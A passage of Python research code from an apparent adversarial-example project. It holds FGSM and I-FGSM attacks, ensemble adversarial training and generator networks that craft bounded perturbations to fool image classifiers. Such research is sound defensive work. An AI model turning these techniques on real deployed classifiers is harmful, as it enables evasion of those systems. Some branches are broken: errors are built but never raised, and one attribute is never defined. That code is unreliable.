help='add the test set in the training set')
parser.add_argument('--train_on_list', default=False, action='store_true',
help='train on a list of classifiers')
parser.add_argument('--test_batch_size', type=int, default=1, metavar='S')
parser.add_argument('--train_with_critic_path', type=str, default=None,
help='Train generator with saved critic model')
# args = vars(args)
args = parser.parse_args()
args.dev = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
args.max_test_model = 2
# args["codec_path"] = list(glob.glob(args["codec_path"].format(PY_ROOT)))[0]
if args.img_resize is not None:
if args.attack_method == "zoo_ae" or args.attack_method == "autozoom_ae":
print("Attack method {} cannot use option img_resize, arugment ignored".format(args["attack_method"]))
if args.attack_type == "targeted" and args.max_iterations < 20000:
args.max_iterations = 5 * args.max_iterations
print('Command line is: {}'.format(' '.join(sys.argv)))
print('Called with args:')
# setup random seed
random.seed(args.seed)
np.random.seed(args.seed)
torch.backends.cudnn.deterministic = True
torch.manual_seed(args.seed)
archs = [args.source_arch]
dataset = args.dataset
if args.test_archs:
archs.clear()
if dataset == "cifar" or dataset == "CIFAR-100":
for arch in MODELS_TEST_STANDARD[dataset]:
test_model_path = "{}/train_pytorch_model/real_image_model/{}-pretrained/{}/checkpoint.pth.tar".format(
PY_ROOT,
dataset, arch)
if os.path.exists(test_model_path):
archs.append(arch)
else:
print(test_model_path + " does not exists!")
else:
for arch in MODELS_TEST_STANDARD[dataset]:
test_model_list_path = "{}/train_pytorch_model/real_image_model/{}-pretrained/checkpoints/{}*.pth.tar".format(
PY_ROOT,
dataset, arch)
test_model_list_path = list(glob.glob(test_model_list_path))
if len(test_model_list_path) == 0: # this arch does not exists in args.dataset
continue
archs.append(arch)
args.arch = ",".join(archs)
for arch in archs:
main(args, arch)
```
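The `cw_loss` method above uses the standard Carlini-Wagner margin: for an untargeted attack it is max over i != y of logit_i minus logit_y, which becomes positive exactly when some wrong class outranks the true one. A toy numeric check with arbitrary logits follows.

```python
# Toy check of the untargeted CW margin: max over wrong-class logits minus the true-class logit.
import torch

logit = torch.tensor([[2.0, 5.0, 1.0]])   # arbitrary logits for 3 classes
label = 0                                 # true class
mask = torch.ones_like(logit, dtype=torch.bool)
mask[0, label] = False
margin = logit[mask].max() - logit[0, label]
print(margin)   # tensor(3.) > 0, i.e. class 1 already beats the true class
```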
#### File: Adversarial-Example-Games/defenses/ensemble_adver_train_mnist.py
```python
import torch
import torchvision
import torch.optim as optim
import torch.utils.data
from torchvision import datasets, transforms
import os
import argparse
import numpy as np
import ipdb
import json
import sys
sys.path.append("..") # Adds higher directory to python modules path.
from utils.utils import create_loaders, load_unk_model, test_classifier
from cnn_models import *
from cnn_models.mnist_ensemble_adv_train_models import *
from classifiers import load_one_classifier
# Code Taken from: https://github.com/cailk/ensemble-adv-training-pytorch
EVAL_FREQUENCY = 100
ARCHITECTURES = {
'VGG16': (VGG, 50),
'res18': (resnet.ResNet18, 500),
'res18_adv': (resnet.ResNet18, 500),
'res18_ens': (resnet.ResNet18, 500),
'dense121': (densenet.densenet_cifar, 500),
'dense121_adv': (densenet.densenet_cifar, 500),
'dense121_ens': (densenet.densenet_cifar, 500),
'googlenet': (googlenet.GoogLeNet, 500),
'googlenet_adv': (googlenet.GoogLeNet, 500),
'googlenet_ens': (googlenet.GoogLeNet, 500),
'lenet': (LeNet, 250),
'wide_resnet': (wide_resnet.Wide_ResNet, None),
'wide_resnet_adv': (wide_resnet.Wide_ResNet, None),
'wide_resnet_ens': (wide_resnet.Wide_ResNet, None)
}
def gen_adv_loss(logits, labels, loss='logloss', mean=False):
'''
Generate the loss function
'''
if loss == 'training':
# use the model's output instead of the true labels to avoid
# label leaking at training time
labels = logits.max(1)[1]
if mean:
out = F.cross_entropy(logits, labels, reduction='mean')
else:
out = F.cross_entropy(logits, labels, reduction='sum')
elif loss == 'logloss':
if mean:
out = F.cross_entropy(logits, labels, reduction='mean')
else:
out = F.cross_entropy(logits, labels, reduction='sum')
else:
raise ValueError('Unknown loss: {}'.format(loss))
return out
def gen_grad(x, model, y, loss='logloss'):
'''
Generate the gradient of the loss function.
'''
model.eval()
x.requires_grad = True
# Define gradient of loss wrt input
logits = model(x)
adv_loss = gen_adv_loss(logits, y, loss)
model.zero_grad()
adv_loss.backward()
grad = x.grad.data
return grad
def symbolic_fgs(data, grad, eps=0.3, clipping=True):
'''
FGSM attack.
'''
    # signed gradient
normed_grad = grad.detach().sign()
# Multiply by constant epsilon
scaled_grad = eps * normed_grad
# Add perturbation to original example to obtain adversarial example
adv_x = data.detach() + scaled_grad
if clipping:
adv_x = torch.clamp(adv_x, 0, 1)
return adv_x
def iter_fgs(model, data, labels, steps, eps):
'''
I-FGSM attack.
'''
adv_x = data
# iteratively apply the FGSM with small step size
for i in range(steps):
grad = gen_grad(adv_x, model, labels)
adv_x = symbolic_fgs(adv_x, grad, eps)
return adv_x
def train_ens(epoch, batch_idx, model, data, labels, optimizer, x_advs=None,
opt_step=True):
model.train()
optimizer.zero_grad()
# Generate cross-entropy loss for training
logits = model(data)
preds = logits.max(1)[1]
loss1 = gen_adv_loss(logits, labels, mean=True)
# add adversarial training loss
if x_advs is not None:
# choose source of adversarial examples at random
# (for ensemble adversarial training)
idx = np.random.randint(len(x_advs))
logits_adv = model(x_advs[idx])
loss2 = gen_adv_loss(logits_adv, labels, mean=True)
loss = 0.5 * (loss1 + loss2)
else:
loss2 = torch.zeros(loss1.size())
loss = loss1
if opt_step:
loss.backward()
optimizer.step()
if batch_idx % EVAL_FREQUENCY == 0:
print('Step: {}(epoch: {})\tLoss: {:.6f}<=({:.6f}, {:.6f})\tError: {:.2f}%'.format(
batch_idx, epoch+1, loss.item(), loss1.item(), loss2.item(), error_rate(preds, labels)
))
return loss
def test(model, data, labels):
model.eval()
correct = 0
logits = model(data)
# Prediction for the test set
preds = logits.max(1)[1]
correct += preds.eq(labels).sum().item()
return correct
def error_rate(preds, labels):
'''
Run the error rate
'''
assert preds.size() == labels.size()
return 100.0 - (100.0 * preds.eq(labels).sum().item()) / preds.size(0)
def get_model_type(model_name):
model_type = {
'modelA': 0, 'modelA_adv': 0, 'modelA_ens': 0, 'modelA_ens1': 0,
'modelB': 1, 'modelB_adv': 1, 'modelB_ens': 1, 'modelB_ens1': 1,
'modelC': 2, 'modelC_adv': 2, 'modelC_ens': 2, 'modelC_ens1': 2,
'modelD': 3, 'modelD_adv': 3, 'modelD_ens': 3, 'modelD_ens1': 3,
'res18': 4, 'res18_adv': 4, 'res18_ens': 4,
'googlenet': 5, 'googlenet_adv': 5, 'googlenet_ens': 5,
'wide_resnet': 6, 'wide_resnet_adv': 6, 'wide_resnet_ens': 6,
'dense121': 7, 'dense121_adv': 7, 'dense121_ens': 7,
}
if model_name not in model_type.keys():
raise ValueError('Unknown model: {}'.format(model_name))
return model_type[model_name]
def main(args):
torch.manual_seed(args.seed)
device = torch.device('cuda' if args.cuda else 'cpu')
train_loader, test_loader = create_loaders(args, root='../data')
eps = args.epsilon
# if src_models is not None, we train on adversarial examples that come
# from multiple models
if args.train_adv:
adv_model_names = args.adv_models
adv_models = [None] * len(adv_model_names)
for i in range(len(adv_model_names)):
type = get_model_type(adv_model_names[i])
if args.dataset == 'cifar':
adv_models[i] = load_one_classifier(args,
load_archs=[adv_model_names[i]]).to(device)
acc = test_classifier(args, adv_models[i], args.dev, test_loader, epoch=0, logger=None)
print("Dataset: %s Model: %s Test set acc: %f" %(args.dataset,
adv_model_names[i], acc))
adv_models[i] = nn.DataParallel(adv_models[i])
else:
adv_models[i] = load_model(args, adv_model_names[i], type=type).to(device)
if args.dataset == 'cifar':
init_func, _ = ARCHITECTURES[args.model]
model = init_func().to(args.dev)
if "wide_resnet" in args.model:
model.apply(wide_resnet.conv_init)
model = nn.DataParallel(model)
else:
model = model_mnist(type=args.type).to(device)
optimizer = optim.Adam(model.parameters())
# Train model
if args.train_adv:
x_advs = [None] * (len(adv_models) + 1)
for epoch in range(args.epochs):
for batch_idx, (data, labels) in enumerate(train_loader):
data, labels = data.to(device), labels.to(device)
for i, m in enumerate(adv_models + [model]):
grad = gen_grad(data, m, labels, loss='training')
x_advs[i] = symbolic_fgs(data, grad, eps=eps)
loss_model = train_ens(epoch, batch_idx, model, data, labels, optimizer, x_advs=x_advs)
else:
for epoch in range(int(args.epochs / 2)):
for batch_idx, (data, labels) in enumerate(train_loader):
data, labels = data.to(device), labels.to(device)
loss_model = train_ens(epoch, batch_idx, model, data, labels, optimizer)
# Finally print the result
correct = 0
with torch.no_grad():
for (data, labels) in test_loader:
data, labels = data.to(device), labels.to(device)
correct += test(model, data, labels)
test_error = 100. - 100. * correct / len(test_loader.dataset)
print('Test Set Error Rate: {:.2f}%'.format(test_error))
path = os.path.join(args.dir_test_models, "pretrained_classifiers",
args.dataset, "ensemble_adv_trained", args.model)
dirname = os.path.dirname(path)
if not os.path.exists(dirname):
os.makedirs(dirname)
torch.save(model.state_dict(), path + args.namestr + '.pt')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Adversarial Training MNIST model')
parser.add_argument('--model', help='path to model')
parser.add_argument('--adv_models', nargs='*', help='path to adv model(s)')
parser.add_argument('--type', type=int, default=0, help='Model type (default: 0)')
parser.add_argument('--seed', type=int, default=1, help='Random seed (default: 1)')
parser.add_argument('--disable_cuda', action='store_true', default=False, help='Disable CUDA (default: False)')
parser.add_argument('--epochs', type=int, default=12, help='Number of epochs (default: 12)')
parser.add_argument('--dataset', type=str, default='mnist')
parser.add_argument('--train_adv', default=False, action='store_true',
help='Whether to train normally or Adversarially')
parser.add_argument("--wandb", action="store_true", default=False, help='Use wandb for logging')
parser.add_argument('--batch_size', type=int, default=256, metavar='S')
parser.add_argument('--test_batch_size', type=int, default=512, metavar='S')
parser.add_argument('--train_set', default='train',
choices=['train_and_test','test','train'],
help='add the test set in the training set')
parser.add_argument('--attack_ball', type=str, default="Linf",
choices= ['L2','Linf'])
parser.add_argument('--architecture', default="VGG16",
help="The architecture we want to attack on CIFAR.")
parser.add_argument('--dir_test_models', type=str, default="../",
help="The path to the directory containing the classifier models for evaluation.")
parser.add_argument('--epsilon', type=float, default=0.1, metavar='M',
help='Epsilon for Delta (default: 0.1)')
parser.add_argument('--train_with_critic_path', type=str, default=None,
help='Train generator with saved critic model')
parser.add_argument('--namestr', type=str, default='1', \
help='additional info in output filename to describe experiments')
args = parser.parse_args()
args.cuda = not args.disable_cuda and torch.cuda.is_available()
args.dev = torch.device('cuda' if args.cuda else 'cpu')
main(args)
```
#### File: Adversarial-Example-Games/models/generators.py
```python
import torch
import math
from torch import nn, optim
import torch.nn.functional as F
from torch.autograd import Variable
from torch.distributions.multivariate_normal import MultivariateNormal
import ipdb
from torch.distributions import Normal
from flows import *
def entropy(input):
max_input, _ = torch.max(input, 1)
input = input - max_input.view(-1, 1).repeat(1, input.shape[1])
softval = F.softmax(input, 1)
entropy = torch.sum(softval *
(input - input.exp().sum(1).log().view(-1, 1).repeat(1, 10)),1)
return torch.mean(entropy)
def sample(input, dim=-1):
softval = F.softmax(input,dim)
index = torch.multinomial(softval,1).view(-1)
output = torch.zeros_like(softval)
output[torch.arange(softval.shape[0]),index] = 1.
# output.eq_(0.)
return output.detach(), entropy
class SampleST(torch.autograd.Function):
@staticmethod
def forward(ctx, input, dim):
output, entropy = sample(input, dim=dim)
ctx.save_for_backward(input, output)
ctx.other_params = dim
return output
@staticmethod
def backward(ctx, grad_output):
gr = None
if ctx.needs_input_grad[0]:
input, output = ctx.saved_variables
dim = ctx.other_params
s = F.softmax(input, dim)
gs = (grad_output * s).sum(dim, True)
gr = s * (grad_output - gs)
return gr, None
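# Note: SampleST is a straight-through estimator. The forward pass returns a hard
# one-hot sample drawn from softmax(input); the backward pass ignores the sampling
# and propagates the softmax gradient instead (gr = s * (grad_output - sum(grad_output * s))),
# so the discrete sampling step remains usable inside a differentiable model.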
class Bottleneck(nn.Module):
def __init__(self, in_planes, growth_rate):
super(Bottleneck, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv1 = nn.Conv2d(in_planes, 4*growth_rate, kernel_size=1, bias=False)
self.bn2 = nn.BatchNorm2d(4*growth_rate)
self.conv2 = nn.Conv2d(4*growth_rate, growth_rate, kernel_size=3, padding=1, bias=False)
def forward(self, x):
out = self.conv1(F.relu(self.bn1(x)))
out = self.conv2(F.relu(self.bn2(out)))
out = torch.cat([out,x], 1)
return out
class Transition(nn.Module):
def __init__(self, in_planes, out_planes):
super(Transition, self).__init__()
self.bn = nn.BatchNorm2d(in_planes)
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=1, bias=False)
def forward(self, x):
out = self.conv(F.relu(self.bn(x)))
out = F.avg_pool2d(out, 2)
return out
# Initialize weights
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
torch.nn.init.xavier_uniform_(m.weight)
class Flatten(nn.Module):
def forward(self, input):
return input.view(input.size(0), -1)
class UnFlatten(nn.Module):
def forward(self, input, size=192):
return input.view(input.size(0), size, 1, 1)
class Generator(nn.Module):
def __init__(self, input_size, latent=50, deterministic=False):
"""
A modified VAE. The latent is a Gaussian (0, sigma) of dimension `latent`.
Decode the latent into a noise vector of size `input_size`.
Note the Gaussian \mu is not learned, since the input `x` acts as the mean.
Args:
input_size: size of image, 784 in case of MNIST
latent: size of multivar Gaussian params
"""
super(Generator, self).__init__()
self.input_size = input_size
self.deterministic = deterministic
self.fc1_mu = nn.Linear(input_size, 400)
self.fc1_sig = nn.Linear(input_size, 400)
self.fc2_sig = nn.Linear(400, latent)
self.fc2_mu = nn.Linear(400,latent)
self.fc3 = nn.Linear(latent, 400)
self.fc4 = nn.Linear(400, input_size)
def encode(self, x):
h_mu = F.relu(self.fc1_mu(x))
h_sig = F.relu(self.fc1_sig(x))
return self.fc2_mu(h_mu), self.fc2_sig(h_sig)
def reparameterize(self, mu, logvar):
std = torch.exp(0.5*logvar)
eps = torch.randn_like(std)
sample = eps.mul(std).add_(mu)
# covar_mat = torch.diag(sample[0])
return sample
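# Note: this is the standard VAE reparameterization trick, z = mu + sigma * eps with
# eps ~ N(0, I) and sigma = exp(0.5 * logvar), which keeps the sampling step
# differentiable with respect to mu and logvar.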
def decode(self, z):
"""
Final layer should probably not have activation?
"""
h3 = F.relu(self.fc3(z))
return self.fc4(h3)
def forward(self, x, epsilon, target=None):
mu, logvar = self.encode(x.view(-1, self.input_size))
z = self.reparameterize(mu, logvar)
delta = self.decode(z)
if self.deterministic:
kl_div = torch.zeros(1, device=x.device)  # device-agnostic zero KL term
else:
kl_div = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())
kl_div = kl_div / x.size(0) # mean over batch
return delta, kl_div
class ConvGenerator(nn.Module):
def __init__(self, nchannels, block, nblocks, deterministic, flow_args, growth_rate=12, reduction=0.5,\
num_classes=10, latent=50, norm="Linf"):
"""
A modified VAE.
Encode the image into h to generate a probability vector p
use p to sample a categorical variable (using gamble softmax)
Decode the concatenation of h and the categorical variable into a delta.
"""
super(ConvGenerator, self).__init__()
self.growth_rate = growth_rate
self.norm = norm
num_planes = 2*growth_rate
self.conv1 = nn.Conv2d(nchannels, num_planes, kernel_size=3, padding=1, bias=False)
self.dense1 = self._make_dense_layers(block, num_planes, nblocks[0])
num_planes += nblocks[0]*growth_rate
out_planes = int(math.floor(num_planes*reduction))
self.trans1 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense2 = self._make_dense_layers(block, num_planes, nblocks[1])
num_planes += nblocks[1]*growth_rate
out_planes = int(math.floor(num_planes*reduction))
self.trans2 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense3 = self._make_dense_layers(block, num_planes, nblocks[2])
num_planes += nblocks[2]*growth_rate
out_planes = int(math.floor(num_planes*reduction))
self.trans3 = Transition(num_planes, out_planes)
num_planes = out_planes
self.dense4 = self._make_dense_layers(block, num_planes, nblocks[3])
num_planes += nblocks[3]*growth_rate
self.bn = nn.BatchNorm2d(num_planes)
self.linear_1 = nn.Linear(num_planes+1, 100)
self.linear_2 = nn.Linear(100, num_classes)
self.linear_3 = nn.Linear(num_classes,latent)
ngf = 64
self.latent = latent
self.log_det_j = 0.
self.deterministic = deterministic
_st_sample = SampleST()
self.sample = lambda x, target=None: _st_sample.apply(x, 1)  # SampleST.forward only accepts (input, dim); target is unused by the straight-through sampler
n_blocks, flow_hidden_size, n_hidden = flow_args[0], flow_args[1], flow_args[2]
flow_model, flow_layer_type = flow_args[3], flow_args[4]
self.flow_model = flow_model
# Flow parameters
if flow_model is not None:
self.flow = flows
self.num_flows = 30
self.num_flows = self.num_flows
# Amortized flow parameters
self.amor_u = nn.Linear(num_planes, self.num_flows * self.latent)
self.amor_w = nn.Linear(num_planes, self.num_flows * self.latent)
self.amor_b = nn.Linear(num_planes, self.num_flows)
# Normalizing flow layers
for k in range(self.num_flows):
flow_k = self.flow()
self.add_module('flow_' + str(k), flow_k)
self.decoder = nn.Sequential(
# input is Z, going into a convolution
nn.ConvTranspose2d(num_planes+1+latent, ngf * 8, 4, 1, 0, bias=False),
nn.BatchNorm2d(ngf * 8),
nn.ReLU(True),
# state size. (ngf*8) x 4 x 4
nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),
nn.BatchNorm2d(ngf * 4),
nn.ReLU(True),
# # state size. (ngf*4) x 8 x 8
nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),
nn.BatchNorm2d(ngf * 2),
nn.ReLU(True),
# # state size. (ngf*2) x 16 x 16
nn.ConvTranspose2d(ngf * 2, 3, 4, 2, 1, bias=False),
nn.BatchNorm2d(3),
nn.ReLU(True),
# # state size. (ngf) x 32 x 32
nn.Tanh()
)
def _make_dense_layers(self, block, in_planes, nblock):
layers = []
for i in range(nblock):
layers.append(block(in_planes, self.growth_rate))
in_planes += self.growth_rate
return nn.Sequential(*layers)
def encode(self, out):
batch_size = out.size(0)
out_1 = self.linear_1(out)
out_2 = self.linear_2(out)
h1 = F.relu(out_1)
h2 = F.relu(out_2)
u,w,b = None,None,None
if self.flow_model is not None:
# return amortized u an w for all flows
u = self.amor_u(out).view(batch_size, self.num_flows, self.latent, 1)
w = self.amor_w(out).view(batch_size, self.num_flows, 1, self.latent)
b = self.amor_b(out).view(batch_size, self.num_flows, 1, 1)
return h1,h2,u,w,b
def reparameterize(self, mu, logvar):
if self.deterministic:
z = mu + logvar.mul(0.5).exp_()
return z
else:
std = logvar.mul(0.5).exp_()
eps = torch.randn_like(std)  # device-agnostic; replaces the CUDA-only FloatTensor + Variable pattern
return eps.mul(std).add_(mu)
def decode(self, z):
z = z.view(-1,self.latent,1,1)
gen = self.decoder(z)
return gen
def forward(self, x, epsilon, target=None):
out = self.conv1(x)
out = self.trans1(self.dense1(out))
out = self.trans2(self.dense2(out))
out = self.trans3(self.dense3(out))
out = self.dense4(out)
out = F.avg_pool2d(F.relu(self.bn(out)), 4)
h = out.view(out.size(0), -1)
# mu,logvar,u,w,b = self.encode(out)
# h = self.reparameterize(mu,logvar)
h = torch.cat((h, epsilon.repeat(x.shape[0], 1)), 1)
logits = self.linear_2(F.relu(self.linear_1(h)))
one_hot = self.sample(logits, target=target)
z = F.relu(self.linear_3(one_hot)) # 8,2,2
h = torch.cat((h, z), 1).view(out.size(0), -1, 1, 1)
delta = self.decoder(h)
# delta = out.view(-1, self.img_dim) - x.view(-1,self.img_dim)
if self.norm == "Linf":
delta = epsilon.item() * delta
elif self.norm == "L2":
raise("L2 norm not implemented on CIFAR not implemented")
norm = torch.norm(delta, dim=1).view(-1, 1).repeat(1, self.img_dim)
mask_norm = norm > epsilon
delta = ~mask_norm * delta + epsilon * delta * mask_norm / norm
else:
NotImplementedError(f"Generator architecture not implemented for norm: {self.norm}")
return torch.clamp(x + delta, min=0., max=1.), entropy(logits)
class DCGAN(nn.Module):
def __init__(self, num_channels=3, ngf=100):
super(DCGAN, self).__init__()
"""
Initialize a DCGAN. Perturbations from the GAN are added to the inputs to
create adversarial attacks.
- num_channels is the number of channels in the input
- ngf is size of the conv layers
"""
self.generator = nn.Sequential(
# input is (nc) x 32 x 32
nn.Conv2d(num_channels, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 1, 1, 0, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 3 x 32 x 32
nn.Conv2d(ngf, num_channels, 1, 1, 0, bias=False),
nn.Tanh()
)
def forward(self, inputs, target=None):
return self.generator(inputs), inputs
def save(self, fn):
torch.save(self.generator.state_dict(), fn)
def load(self, fn):
self.generator.load_state_dict(torch.load(fn))
class Cond_DCGAN(nn.Module):
def __init__(self, num_channels=3, ngf=100):
super(Cond_DCGAN, self).__init__()
"""
Initialize a DCGAN. Perturbations from the GAN are added to the inputs to
create adversarial attacks.
- num_channels is the number of channels in the input
- ngf is size of the conv layers
"""
self.fcy = nn.Linear(10,100)
self.fcz = nn.Linear(784, 200)
self.generator = nn.Sequential(
# input is (nc) x 32 x 32
nn.Conv2d(num_channels, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout2d(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
#nn.Dropout(),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 3, 1, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 48 x 32 x 32
nn.Conv2d(ngf, ngf, 1, 1, 0, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. 3 x 32 x 32
nn.Conv2d(ngf, num_channels, 1, 1, 0, bias=False),
nn.Tanh()
)
def forward(self, inputs, labels=None, nb_digits=10, target=None):
if labels is None:
batch_size = inputs.shape[0]
y = torch.randint(0, nb_digits,(batch_size,1))
# One hot encoding buffer that you create out of the loop and just keep reusing
y_onehot = torch.zeros(batch_size, nb_digits)
labels = y_onehot.scatter_(1, y, 1)
x = F.relu(self.fcz(inputs))
y = F.relu(self.fcy(labels))
inputs = torch.cat([x, y], 1)
return self.generator(inputs), inputs
def save(self, fn):
torch.save(self.generator.state_dict(), fn)
def load(self, fn):
self.generator.load_state_dict(torch.load(fn))
class MnistGenerator(nn.Module):
def __init__(self, norm="Linf"):
super(MnistGenerator, self).__init__()
self.encoder = nn.Sequential(
nn.Conv2d(1, 64, 3, stride=3, padding=1), # b, 64, 10, 10
nn.LeakyReLU(0.2),
nn.MaxPool2d(2, stride=2), # b, 64, 5, 5
nn.Conv2d(64, 32, 3, stride=2, padding=1), # b, 32, 3, 3
nn.LeakyReLU(0.2),
nn.MaxPool2d(2, stride=1) # b, 32, 2, 2
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(64, 32, 3, stride=2), # b, 32, 5, 5
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(32, 16, 5, stride=3, padding=1), # b, 16, 15, 15
nn.LeakyReLU(0.2),
nn.ConvTranspose2d(16, 1, 2, stride=2, padding=1), # b, 1, 28, 28
nn.Tanh()
)
_st_sample = SampleST()
self.sample = lambda x: _st_sample.apply(x,1)
self.fc = nn.Sequential(
nn.Linear(32*2*2+1,64),
nn.LeakyReLU(.2),
nn.Linear(64,10))
self.fc_z = nn.Linear(10,32*2*2-1)
self.fc_input = nn.Linear(10,32*2*2-1)
self.norm = norm
self.img_dim = 28*28
def forward(self, x, epsilon, target=None):
h = self.encoder(x)
h = torch.cat((h.view(-1,32*2*2),epsilon.repeat(x.shape[0],1)),1)
logits = self.fc(h.view(-1,32*2*2+1))
one_hot = self.sample(logits)
z = self.fc_z(one_hot)
if target is not None:
target_onehot = torch.zeros(target.size() + (10,)).cuda()
target_onehot.scatter_(1, target.detach().unsqueeze(1), 1)
z += self.fc_input(target_onehot)
z = F.relu(z)
h = torch.cat((h,z),1).view(-1,64,2,2)
# delta = self.decoder(h).view(-1,self.img_dim)
out = .5*(self.decoder(h) + 1.)
delta = out - x
if self.norm == "Linf":
delta = epsilon.item() * delta
elif self.norm == "L2":
norm = torch.norm(delta, dim=1).view(-1,1).repeat(1,self.img_dim)
mask_norm = norm > epsilon
delta = ~mask_norm * delta + epsilon * delta * mask_norm / norm  # epsilon is the forward argument (no self.epsilon on this module)
else:
NotImplementedError(f"Generator architecture not implemented for norm: {self.norm}" )
output = x + delta
return output , entropy(logits)
# if self.norm == "Linf":
# delta = epsilon.item() * delta
# elif self.norm == "L2":
# norm = torch.norm(delta, dim=1).view(-1, 1).repeat(1, self.img_dim)
# mask_norm = norm > epsilon
# delta = ~mask_norm * delta + epsilon * delta * mask_norm / norm
# else:
# NotImplementedError(f"Generator architecture not implemented for norm: {self.norm}")
# output = x.view(-1, self.img_dim) + delta
# return output , entropy(logits)
def save(self, fn_enc, fn_dec):
torch.save(self.encoder.state_dict(), fn_enc)
torch.save(self.decoder.state_dict(), fn_dec)
def load(self, fn_enc, fn_dec):
self.encoder.load_state_dict(torch.load(fn_enc))
self.decoder.load_state_dict(torch.load(fn_dec))
class ResnetGenerator(nn.Module):
"""Resnet-based generator that consists of Resnet blocks between a few downsampling/upsampling operations.
We adapt Torch code and ideas from <NAME>'s neural style transfer project (https://github.com/jcjohnson/fast-neural-style).
"""
def __init__(self, device, input_nc, output_nc, epsilon=.3, norm="Linf",
ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False,
n_blocks=6, padding_type='reflect'):
"""Construct a Resnet-based generator
Parameters:
input_nc (int) -- the number of channels in input images
output_nc (int) -- the number of channels in output images
ngf (int) -- the number of filters in the last conv layer
norm_layer -- normalization layer
use_dropout (bool) -- if use dropout layers
n_blocks (int) -- the number of ResNet blocks
padding_type (str) -- the name of padding layer in conv layers: reflect | replicate | zero
"""
assert(n_blocks >= 0)
super(ResnetGenerator, self).__init__()
_st_sample = SampleST()
self.sample = lambda x: _st_sample.apply(x, 1)
self.ngf=ngf
self.device = device
self.epsilon = epsilon
self.norm = norm
self.fc_z = nn.Linear(10, 63)
self.fc_input = nn.Linear(10,63)
self.fc_h = nn.Sequential(
nn.Linear(16*32*32-63,100),
nn.ReLU(True),
nn.Linear(100,10)
)
use_bias = norm_layer == nn.InstanceNorm2d
pre_model = [nn.ReflectionPad2d(3),
nn.Conv2d(input_nc, ngf-1, kernel_size=7, padding=0, bias=use_bias),
norm_layer(ngf-1),
nn.ReLU(True)]
n_downsampling = 2
for i in range(n_downsampling): # add downsampling layers
mult = 2 ** i
pre_model += [nn.Conv2d(ngf * mult-1, ngf * mult * 2-1, kernel_size=3, stride=2, padding=1, bias=use_bias),
norm_layer(ngf * mult * 2-1),
nn.ReLU(True)]
mult = 2 ** n_downsampling
assert(n_blocks % 2 == 0)
for i in range(n_blocks//2): # add ResNet blocks
pre_model += [ResnetBlock(ngf * mult-1, padding_type=padding_type,
norm_layer=norm_layer,
use_dropout=use_dropout, use_bias=use_bias)]
self.pre_model = nn.Sequential(*pre_model)
model = []
for i in range(n_blocks//2):
model += [ResnetBlock(ngf * mult, padding_type=padding_type,
norm_layer=norm_layer,
use_dropout=use_dropout, use_bias=use_bias)]
for i in range(n_downsampling): # add upsampling layers
mult = 2 ** (n_downsampling - i)
model += [nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2),
kernel_size=3, stride=2,
padding=1, output_padding=1,
bias=use_bias),
norm_layer(int(ngf * mult / 2)),
nn.ReLU(True)]
model += [nn.ReflectionPad2d(3)]
model += [nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0)]
model += [nn.Tanh()]
self.model = nn.Sequential(*model)
def forward(self, input, epsilon, target=None):
"""Standard forward"""
h = self.pre_model(input)
batch_size = input.shape[0]
h = torch.cat((h.view(batch_size, -1), epsilon.repeat(batch_size, 1)), 1)
logit = self.fc_h(h)
one_hot = self.sample(logit)
z = self.fc_z(one_hot)
if target is not None:
target_onehot = torch.zeros(target.size() + (10,)).cuda()
target_onehot.scatter_(1, target.detach().unsqueeze(1), 1)
z += self.fc_input(target_onehot)
z = F.relu(z)
h = torch.cat((h,z),1).view(batch_size,256,8,8)
delta = self.model(h)
if self.norm == "Linf":
delta = epsilon.item() * delta # outputs in [-1,1]
else:
norm = torch.norm(delta, p=2,dim=(1,2,3)).view(-1, 1,1,1).repeat(1, 3,32,32)
mask_norm = norm > self.epsilon
delta = ~mask_norm * delta + epsilon * delta * mask_norm / norm
return input + delta, entropy(logit)
class ResnetBlock(nn.Module):
"""Define a Resnet block"""
def __init__(self, dim, padding_type, norm_layer, use_dropout, use_bias):
